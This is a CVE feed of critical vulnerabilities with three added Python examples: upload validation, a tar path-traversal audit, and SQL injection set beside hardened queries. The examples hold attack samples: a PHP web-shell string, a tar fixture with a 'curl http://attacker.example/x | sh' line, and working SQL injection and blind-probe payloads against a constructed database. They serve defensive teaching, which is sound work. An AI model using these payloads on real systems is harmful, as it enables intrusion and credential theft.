Latest CVE Feed

CVE-2024-8940 (CVSS 10.0, CRITICAL)
Vulnerability in the Scriptcase application version 9.4.019, which involves the arbitrary upload of a file via /scriptcase/devel/lib/third/jquery_plugin/jQuery-File-Upload/server/php/ via a POST request. An attacker could upload malicious files to the ser...
- Affected Products: scriptcase
- Published: Sep. 25, 2024
- Modified: Oct. 01, 2024

CVE-2023-6018 (CVSS 10.0, CRITICAL)
An attacker can overwrite any file on the server hosting MLflow without any authentication.
- Affected Products: mlflow
- EPSS Score: 88.39%
- Published: Nov. 16, 2023
- Modified: Nov. 21, 2024

CVE-2017-9479 (CVSS 10.0, HIGH)
The Comcast firmware on Cisco DPC3939 (firmware version dpc3939-P20-18-v303r20421746-170221a-CMCST) devices allows remote attackers to execute arbitrary commands as root by leveraging local network access and connecting to the syseventd server, as demonst...
- EPSS Score: 2.34%
- Published: Jul. 31, 2017
- Modified: Apr. 20, 2025

CVE-2024-7332 (CVSS 10.0, HIGH)
A vulnerability was found in TOTOLINK CP450 4.1.0cu.747_B20191224. It has been classified as critical. This affects an unknown part of the file /web_cste/cgi-bin/product.ini of the component Telnet Service. The manipulation leads to use of hard-coded pass...
- Published: Aug. 01, 2024
- Modified: Aug. 09, 2024

CVE-2011-2961 (CVSS 10.0, HIGH)
Heap-based buffer overflow in AngelServer.exe 6.0.11.3 in Sunway pNetPower allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted UDP packet.
- Affected Products: pnetpower
- EPSS Score: 11.19%
- Published: Jul. 29, 2011
- Modified: Apr. 11, 2025

CVE-2024-32809 (CVSS 10.0, CRITICAL)
Unrestricted Upload of File with Dangerous Type vulnerability in JumpDEMAND Inc. ActiveDEMAND allows Using Malicious Files. This issue affects ActiveDEMAND: from n/a through 0.2.41.
- Affected Products: activedemand
- Published: May. 17, 2024
- Modified: Nov. 21, 2024
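The Scriptcase and ActiveDEMAND entries above are both the same class, unrestricted file upload, and the feed gives no detail beyond that. The following is an added example, not code from either product or from this feed: a weak upload check that trusts the client-supplied filename and Content-Type, beside a hardened check that validates the final extension against an allowlist, verifies the content's magic bytes, and stores the file under a server-chosen name. The extension table, size limit and sample payloads are all constructed for the illustration.

```python
"""Server-side validation of an upload, the control the unrestricted-upload
entries above lack. Illustration only; not Scriptcase or ActiveDEMAND code."""
import os
import posixpath
import secrets

# Extension allowlist paired with the magic bytes the content must start with
# (constructed for the demo; extend per application).
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".pdf": b"%PDF-",
}
MAX_BYTES = 5 * 1024 * 1024


class UploadRejected(ValueError):
    pass


def naive_accept(filename: str, content_type: str) -> bool:
    """The weak check many upload handlers ship with: it trusts the extension
    and the Content-Type, both of which the client chooses in the multipart body."""
    ext = os.path.splitext(filename)[1].lower()
    return ext in ALLOWED and content_type.startswith(("image/", "application/pdf"))


def validate_upload(filename: str, content_type: str, data: bytes) -> str:
    """Hardened check. content_type is accepted but deliberately ignored.
    Returns the name to store the file under, or raises UploadRejected."""
    # 1. Drop any directory part the client sent ("../../x.png", "C:\\x.png").
    base = posixpath.basename(filename.replace("\\", "/"))
    if not base or base.startswith("."):
        raise UploadRejected("empty or hidden filename")
    # 2. Judge only the final extension; "shell.php.png" is decided by ".png"
    #    and by its bytes, and the stored name below keeps only that suffix.
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        raise UploadRejected(f"extension {ext!r} not allowed")
    # 3. Size check before any content inspection.
    if len(data) > MAX_BYTES:
        raise UploadRejected("file too large")
    # 4. Content must match the extension; PHP source behind an image
    #    extension fails here regardless of what Content-Type claimed.
    if not data.startswith(ALLOWED[ext]):
        raise UploadRejected("content does not match extension")
    # 5. Never store under the client-supplied name: a random server-chosen
    #    name blocks path tricks and collisions with existing files.
    return secrets.token_hex(16) + ext


def is_accepted(filename: str, content_type: str, data: bytes) -> bool:
    """True if the hardened check would store the file."""
    try:
        validate_upload(filename, content_type, data)
    except UploadRejected:
        return False
    return True


# Constructed sample payloads (not real uploads).
PNG_OK = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
PHP_AS_PNG = b"<?php system($_GET['c']); ?>"

if __name__ == "__main__":
    print(naive_accept("shell.png", "image/png"))               # weak check lets it through
    print(is_accepted("shell.png", "image/png", PHP_AS_PNG))    # hardened check rejects it
    print(validate_upload("../../x.png", "image/png", PNG_OK))  # random name ending in .png
```

The magic-byte check is the step that matters against the renamed-PHP case; the random storage name is what neutralises double extensions and traversal in the client filename, since whatever the client sent never reaches the filesystem.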

CVE-2021-25437 (CVSS 10.0, HIGH)
Improper access control vulnerability in Tizen FOTA service prior to Firmware update JUL-2021 Release allows attackers to execute arbitrary code by replacing the FOTA update file.
- Affected Products: tizen
- EPSS Score: 1.14%
- Published: Jul. 08, 2021
- Modified: Nov. 21, 2024

CVE-2024-8529 (CVSS 10.0, CRITICAL)
The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_fields' parameter of the /wp-json/lp/v1/courses/archive-course REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping ...
- Affected Products: learnpress
- Published: Sep. 12, 2024
- Modified: Sep. 13, 2024

CVE-2008-0529 (CVSS 10.0, HIGH)
Buffer overflow in the telnet server in Cisco Unified IP Phone 7906G, 7911G, 7941G, 7961G, 7970G, and 7971G running SCCP firmware might allow remote authenticated users to execute arbitrary code via a crafted command.
- EPSS Score: 7.10%
- Published: Feb. 15, 2008
- Modified: Apr. 09, 2025

CVE-2021-27944 (CVSS 10.0, HIGH)
Several high privileged APIs on the Vizio P65-F1 6.0.31.4-2 and E50x-E1 10.0.31.4-2 Smart TVs do not enforce access controls, allowing an unauthenticated threat actor to access privileged functionality, leading to OS command execution. The specific attack...
- EPSS Score: 1.07%
- Published: Aug. 26, 2021
- Modified: Nov. 21, 2024

CVE-2022-24552 (CVSS 10.0, HIGH)
A flaw was found in the REST API in StarWind Stack. REST command, which manipulates a virtual disk, doesn’t check input parameters. Some of them go directly to bash as part of a script. An attacker with non-root user access can inject arbitrary data into ...
- EPSS Score: 0.83%
- Published: Feb. 06, 2022
- Modified: Nov. 21, 2024

CVE-2025-22612 (CVSS 10.0, CRITICAL)
Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.374, the missing authorization allows an authenticated user to retrieve any existing private keys on a coolify instance in plai...
- Published: Jan. 24, 2025
- Modified: Jan. 24, 2025
- Vuln Type: Authorization

CVE-2024-10081 (CVSS 10.0, CRITICAL)
CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Analyzer and Clang Tidy. Authentication bypass occurs when the API URL ends with Authentication. This bypass allows superuser access to all API endpoints other ...
- Published: Nov. 06, 2024
- Modified: Nov. 06, 2024

CVE-2025-26936 (CVSS 10.0, CRITICAL)
Improper Control of Generation of Code ('Code Injection') vulnerability in NotFound Fresh Framework allows Code Injection. This issue affects Fresh Framework: from n/a through 1.70.0.
- Published: Mar. 10, 2025
- Modified: Mar. 10, 2025
- Vuln Type: Injection

CVE-2025-30367 (CVSS 10.0, CRITICAL)
WeGIA is a Web manager for charitable institutions. A SQL Injection vulnerability was identified in versions prior to 3.2.6 in the nextPage parameter of the /WeGIA/controle/control.php endpoint. This vulnerability allows an attacker to manipulate SQL queries...
- Affected Products: wegia
- Published: Mar. 27, 2025
- Modified: Apr. 10, 2025
- Vuln Type: Injection

CVE-2024-37902 (CVSS 10.0, CRITICAL)
DeepJavaLibrary(DJL) is an Engine-Agnostic Deep Learning Framework in Java. DJL versions 0.1.0 through 0.27.0 do not prevent absolute path archived artifacts from inserting archived files directly into the system, overwriting system files. This is fixed i...
- Published: Jun. 17, 2024
- Modified: Nov. 21, 2024
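The DJL entry above describes the archive-extraction class: member names that are absolute, or that climb out of the destination with "..", get written wherever they point. The following is an added example, not DJL's code and not taken from this feed: a pure-path audit of tar members that rejects absolute names, traversal after normalisation, and symlink or hard-link targets that escape, run against a constructed in-memory archive. The member names, payloads and reason strings are all constructed for the illustration.

```python
"""Auditing archive members for absolute and traversing paths before
extraction, the check the DJL entry above describes as missing. Illustration
only, with a constructed tar archive; it is not DJL's code."""
import io
import posixpath
import tarfile
from typing import Dict, List, Optional, Tuple


def path_escape_reason(name: str) -> Optional[str]:
    """Pure path logic, no filesystem access. Returns None when the entry
    stays inside the extraction root."""
    n = name.replace("\\", "/")
    # Absolute POSIX path, or a Windows drive letter such as "C:/...".
    if n.startswith("/") or (len(n) > 1 and n[1] == ":"):
        return "absolute path"
    norm = posixpath.normpath(n)
    # After collapsing "." and ".." segments, anything still climbing out is traversal.
    if norm == ".." or norm.startswith("../"):
        return "path traversal"
    return None


def member_escape_reason(member: tarfile.TarInfo) -> Optional[str]:
    """Checks the member name and, for links, the link target too: a symlink
    to ../../etc/passwd followed by a later member writing through it is the
    classic way past a name-only check."""
    reason = path_escape_reason(member.name)
    if reason:
        return reason
    if member.issym():
        # Symlink targets resolve relative to the link's own directory.
        target = posixpath.join(posixpath.dirname(member.name), member.linkname)
        if path_escape_reason(target):
            return "link target escapes destination"
    elif member.islnk():
        # Hard link targets are archive-relative paths.
        if path_escape_reason(member.linkname):
            return "link target escapes destination"
    return None


def audit_archive(data: bytes) -> Tuple[List[str], Dict[str, str]]:
    """Splits an in-memory tar into members safe to extract and rejected
    members with a reason. Nothing is written to disk."""
    safe: List[str] = []
    rejected: Dict[str, str] = {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r") as tar:
        for member in tar.getmembers():
            reason = member_escape_reason(member)
            if reason:
                rejected[member.name] = reason
            else:
                safe.append(member.name)
    return safe, rejected


def build_sample_archive() -> bytes:
    """Constructed archive: one legitimate artifact and four escaping members."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        def add_file(name: str, payload: bytes) -> None:
            info = tarfile.TarInfo(name)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))

        add_file("model/weights.bin", b"\x00" * 16)
        add_file("/etc/cron.d/pwn", b"* * * * * root /tmp/x\n")
        add_file("../../.bashrc", b"curl http://attacker.example/x | sh\n")
        add_file("model/../../escape.txt", b"x")
        link = tarfile.TarInfo("model/link")
        link.type = tarfile.SYMTYPE
        link.linkname = "../../../etc/passwd"
        tar.addfile(link)
    return buf.getvalue()


if __name__ == "__main__":
    ok, bad = audit_archive(build_sample_archive())
    print("safe:", ok)
    for name, why in bad.items():
        print("rejected:", name, "->", why)
```

The check runs before any member is extracted, so a single bad entry can fail the whole artifact rather than leaving a half-written tree. On Python 3.12 and later (and the backports to supported 3.8 to 3.11 releases), passing `filter="data"` to `TarFile.extractall` applies a comparable rejection of absolute paths, traversal and escaping links at extraction time; the explicit audit above is still useful where the verdict has to be logged or the artifact quarantined.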

CVE-2007-0496 (CVSS 10.0, HIGH)
PHP remote file inclusion vulnerability in lib/nl/nl.php in Neon Labs Website (nlws) 3.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the g_strRootDir parameter.
- Affected Products: neon_labs_website
- EPSS Score: 1.45%
- Published: Jan. 25, 2007
- Modified: Apr. 09, 2025

CVE-2024-4196 (CVSS 10.0, CRITICAL)
An improper input validation vulnerability was discovered in Avaya IP Office that could allow remote command or code execution via a specially crafted web request to the Web Control component. Affected versions include all versions prior to 11.1.3.1.
- Affected Products: ip_office
- Published: Jun. 25, 2024
- Modified: Jan. 21, 2025

CVE-2025-5600 (CVSS 10.0, HIGH)
A vulnerability, which was classified as critical, has been found in TOTOLINK EX1200T 4.1.2cu.5232_B20210713. This issue affects the function setLanguageCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument LangType leads to stack-based b...
- Published: Jun. 04, 2025
- Modified: Jun. 10, 2025
- Vuln Type: Memory Corruption

CVE-2024-39911 (CVSS 10.0, CRITICAL)
1Panel is a web-based linux server management control panel. 1Panel contains an unspecified sql injection via User-Agent handling. This issue has been addressed in version 1.10.12-lts. Users are advised to upgrade. There are no known workarounds for this ...
- Affected Products: 1panel
- Published: Jul. 18, 2024
- Modified: Nov. 21, 2024
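Three entries in this feed are SQL injection through a request parameter: LearnPress's 'c_fields' (a column list), WeGIA's nextPage (a paging value) and 1Panel's User-Agent header. The following is an added example, not code from any of those projects or from this feed, built on a constructed SQLite schema with hypothetical function names. It shows why the two parameter kinds need different fixes: a column list cannot be a bound parameter and must be allowlisted, while a paging value belongs in a bound parameter. The vulnerable form is shown leaking a constructed password hash directly through the column list and one bit at a time through the numeric offset; the hardened form beside it rejects both payloads.

```python
"""SQL injection through REST parameters, vulnerable form beside the
hardened form. Illustration only, built on a constructed SQLite schema;
it is not code from LearnPress, WeGIA or 1Panel."""
import sqlite3
from typing import List, Tuple

# Hypothetical course table the endpoint pages through, plus a table an
# attacker would want to read. All rows are constructed for the demo.
SCHEMA = """
CREATE TABLE courses(id INTEGER PRIMARY KEY, title TEXT, price REAL);
CREATE TABLE users(id INTEGER PRIMARY KEY, login TEXT, pw_hash TEXT);
INSERT INTO courses(title, price) VALUES ('Intro', 0), ('Advanced', 49.0), ('Pro', 99.0);
INSERT INTO users(login, pw_hash) VALUES ('admin', '$2y$10$constructedhash');
"""
PAGE_SIZE = 2
ALLOWED_FIELDS = {"id", "title", "price"}   # the only identifiers the API may select


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def archive_vulnerable(conn: sqlite3.Connection, c_fields: str, next_page: str) -> List[Tuple]:
    """Request parameters spliced straight into the statement. A column list
    cannot be a bound parameter, so the temptation to format it in is real;
    the offset could have been bound but was formatted in as well."""
    sql = f"SELECT {c_fields} FROM courses ORDER BY id LIMIT {PAGE_SIZE} OFFSET {next_page}"
    return conn.execute(sql).fetchall()


def archive_hardened(conn: sqlite3.Connection, c_fields: str, next_page: str) -> List[Tuple]:
    """Identifiers go through an allowlist, values go through bound parameters."""
    fields = [f.strip() for f in c_fields.split(",") if f.strip()]
    if not fields or any(f not in ALLOWED_FIELDS for f in fields):
        raise ValueError("c_fields contains a column that is not allowed")
    try:
        page = int(next_page)
    except ValueError:
        raise ValueError("nextPage must be an integer") from None
    if page < 0:
        raise ValueError("nextPage must be non-negative")
    cols = ", ".join(f'"{f}"' for f in fields)   # every name already vetted above
    sql = f"SELECT {cols} FROM courses ORDER BY id LIMIT ? OFFSET ?"
    return conn.execute(sql, (PAGE_SIZE, page * PAGE_SIZE)).fetchall()


def blind_probe(conn: sqlite3.Connection, prefix: str) -> bool:
    """Boolean-based blind injection through the numeric offset: the payload
    evaluates to OFFSET 0 when the guessed prefix is right and OFFSET 1 when
    it is wrong, so the id of the first returned row leaks one bit per request."""
    payload = (
        "(SELECT CASE WHEN substr(pw_hash, 1, %d) = '%s' THEN 0 ELSE 1 END "
        "FROM users WHERE login = 'admin')" % (len(prefix), prefix)
    )
    rows = archive_vulnerable(conn, "id", payload)
    return rows[0][0] == 1


def hardened_rejects(conn: sqlite3.Connection, c_fields: str, next_page: str) -> bool:
    """True if the hardened endpoint refuses the request."""
    try:
        archive_hardened(conn, c_fields, next_page)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    # Direct exfiltration through the column list:
    print(archive_vulnerable(db, "title, (SELECT pw_hash FROM users WHERE login='admin')", "0"))
    # Blind extraction through the offset, one guess at a time:
    print(blind_probe(db, "$2y"), blind_probe(db, "abc"))
    # The hardened form rejects both payload kinds and still pages normally:
    print(hardened_rejects(db, "title, (SELECT pw_hash FROM users)", "0"))
    print(archive_hardened(db, "id, title", "1"))
```

Escaping alone would not have saved the column-list case: a quoted identifier is still an identifier the attacker chose, which is why the hardened form compares each name against a fixed set before building the statement, and only the paging value is passed to the driver as a parameter.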